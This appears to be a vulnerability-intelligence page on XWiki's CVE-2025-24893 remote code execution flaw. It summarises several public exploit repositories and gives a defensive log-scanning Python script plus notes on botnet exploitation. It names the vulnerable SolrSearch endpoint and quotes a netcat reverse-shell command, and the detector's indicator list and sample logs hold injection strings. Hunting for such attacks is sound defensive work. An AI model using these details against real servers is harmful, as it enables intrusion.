This repository contains a proof-of-concept exploit for CVE-2025-24893, a critical unauthenticated remote code execution vulnerability in XWiki. The main file, 'CVE-2025-24893-PoC.py', is a Python script that crafts a malicious Groovy payload and delivers it to the vulnerable XWiki endpoint via an HTTP GET request. The payload enables arbitrary command execution on the target server, including the ability to establish a reverse shell. The script takes the target URL and the desired command as arguments, encodes the payload, and sends it to the '/bin/get/Main/SolrSearch' endpoint. The README provides detailed usage instructions, including how to obtain a reverse shell using base64 encoding. The exploit is network-based, requires no authentication, and targets XWiki installations vulnerable to CVE-2025-24893. The repository is structured simply, with one Python exploit script and a README file.
This repository contains a Python exploit for CVE-2025-24893, a remote code execution vulnerability in the XWiki Platform. The main file, CVE-2025-24893.py, is a self-contained exploit script that leverages a Groovy template injection vulnerability in the SolrSearch component of XWiki. The exploit works by sending a specially crafted HTTP request to the vulnerable endpoint, which executes arbitrary commands on the server. The default payload establishes a reverse shell from the target to the attacker's machine using 'busybox nc <callback_ip> <callback_port> -e /bin/sh'. The script includes features such as automatic protocol detection (HTTP/HTTPS), a test mode to verify exploitability, an integrated reverse shell listener using pwntools, and automatic reconnection if the shell drops. The README.md provides detailed usage instructions, requirements, and troubleshooting tips. The exploit is operational and provides an interactive shell upon successful exploitation. The only code file is CVE-2025-24893.py, which serves as the entry point for the exploit.
This repository contains a Python proof-of-concept exploit (poc.py) targeting XWiki instances vulnerable to Server-Side Template Injection (SSTI) via the SolrSearch endpoint. The exploit first tests if the target is vulnerable by injecting a Groovy payload and checking for a known string in the response. If the target is confirmed vulnerable, it provides an interactive shell interface, allowing the attacker to execute arbitrary system commands on the server by injecting Groovy code through the 'text' parameter of the SolrSearch endpoint. The exploit communicates with the target over HTTP, constructs payloads dynamically, and parses the RSS/XML response to extract command output. The repository also includes a README.md with usage instructions and a requirements.txt listing Python dependencies (requests, beautifulsoup4). No hardcoded IPs or domains are present; the target URL is supplied by the user at runtime. The exploit is operational and provides real command execution capabilities if the target is vulnerable.
This repository contains a proof-of-concept (PoC) exploit for CVE-2025-24893, a remote code execution (RCE) vulnerability in XWiki Platform. The main file, 'CVE-2025-24893-EXP.py', is a Python script that takes a target URL and a system command as arguments. It crafts a malicious Groovy payload, URL-encodes it, and sends it to the vulnerable XWiki endpoint '/bin/get/Main/SolrSearch?media=rss&text=<payload>' via an HTTP GET request. If the target is vulnerable, the server executes the supplied command and returns the output, which the script extracts and displays. The exploit does not require authentication and targets specific vulnerable versions of XWiki as described in the README. The repository is structured simply, with one exploit script and a README providing usage instructions and affected version details. No hardcoded IPs or domains are present; the target URL is supplied by the user at runtime.
This repository contains a Python exploit script (CVE-2025-24893.py) targeting a remote code execution (RCE) vulnerability in XWiki (CVE-2025-24893). The exploit works by sending a specially crafted HTTP GET request to the '/xwiki/bin/get/Main/SolrSearch' endpoint with a malicious Groovy payload embedded in the 'text' parameter. The script takes two arguments: the target XWiki base URL and the Groovy command to execute. It checks for successful exploitation by searching for the string 'EXPLOIT_SUCCESS' in the response. The repository also includes a README.md with usage instructions and a legal disclaimer. The exploit is operational, allowing arbitrary Groovy code execution on vulnerable XWiki instances accessible over the network.
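All of the PoCs above share one request shape: a GET to /bin/get/Main/SolrSearch (one uses /bin/view/), usually with media=rss, and a text parameter carrying macro syntax and Groovy. That makes the endpoint cheap to hunt for in proxy logs. The following is an added example, not code from the page or from any listed repository, that scans combined-format access log lines for such requests. The sample log lines are constructed, the indicator list is an assumption drawn from the exploit descriptions above, and double URL-encoding is handled because parse_qs decodes only one layer.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined log format as written by nginx/Apache in front of the XWiki servlet
# container (assumption about the deployment).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Both the get and view actions render the SolrSearch page, per the PoC summaries above.
SOLR_PATH_RE = re.compile(r"/bin/(?:get|view)/Main/SolrSearch$")

# Indicator strings (assumption, derived from the exploit descriptions on this page:
# macro syntax break-out, the Groovy macro, and base64-decoded bash stagers).
INDICATORS = ("{{", "}}", "groovy", "runtime.getruntime", "base64 -d", "/bin/bash", "/bin/sh")


def inspect_target(target: str) -> list:
    """Return the indicators found in the text parameter of a SolrSearch request,
    or an empty list for any other request."""
    parts = urlsplit(target)
    if not SOLR_PATH_RE.search(parts.path):
        return []
    params = parse_qs(parts.query, keep_blank_values=True)
    found = set()
    for value in params.get("text", []):
        # parse_qs already removed one layer of percent-encoding; a second
        # unquote catches double-encoded payloads.
        decoded = unquote(value).lower()
        found.update(ind for ind in INDICATORS if ind in decoded)
    return sorted(found)


def scan_log(lines) -> list:
    """Return one finding per log line whose SolrSearch request carries indicators."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = inspect_target(m["target"])
        if hits:
            findings.append({
                "ip": m["ip"],
                "time": m["time"],
                "status": int(m["status"]),
                "indicators": hits,
            })
    return findings


# Constructed sample lines: a normal search, a macro/Groovy injection via the get action,
# an unrelated page view, and a double-encoded injection via the view action.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2025:12:00:01 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=release+notes HTTP/1.1" 200 1843',
    '198.51.100.7 - - [10/Mar/2025:12:00:09 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22probe%22)%7B%7B%2Fgroovy%7D%7D HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Mar/2025:12:00:10 +0000] "GET /xwiki/bin/view/Main/WebHome HTTP/1.1" 200 9001',
    '198.51.100.7 - - [10/Mar/2025:12:00:14 +0000] "GET /xwiki/bin/view/Main/SolrSearch?text=%257B%257Bgroovy%257D%257Dprintln(1)%257B%257B%252Fgroovy%257D%257D HTTP/1.1" 200 498',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} status={f['status']} indicators={f['indicators']}")
```

A 200 response to one of these requests is not proof of compromise on its own (the page still renders for a benign search), so treat a hit as a trigger to pull the full request and check the instance version rather than as a verdict; and because several PoCs send the payload as a plain GET, the query string is normally logged in full, which is what makes this hunt viable.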
Recent activity
A 2025 vulnerability listed as one of the CVEs later incorporated into RondoDox exploitation activity.
A report citing an XWiki vulnerability (not further identified in that source) as being used by threat actors targeting cloud instances.
A specific XWiki vulnerability highlighted in Google's report as being exploited in attacks, including activity tied to the RondoDox botnet.
A remote code execution vulnerability in XWiki Platform that can be triggered via a crafted search string, enabling arbitrary code execution on the server; patched but later widely exploited due to slow patch adoption.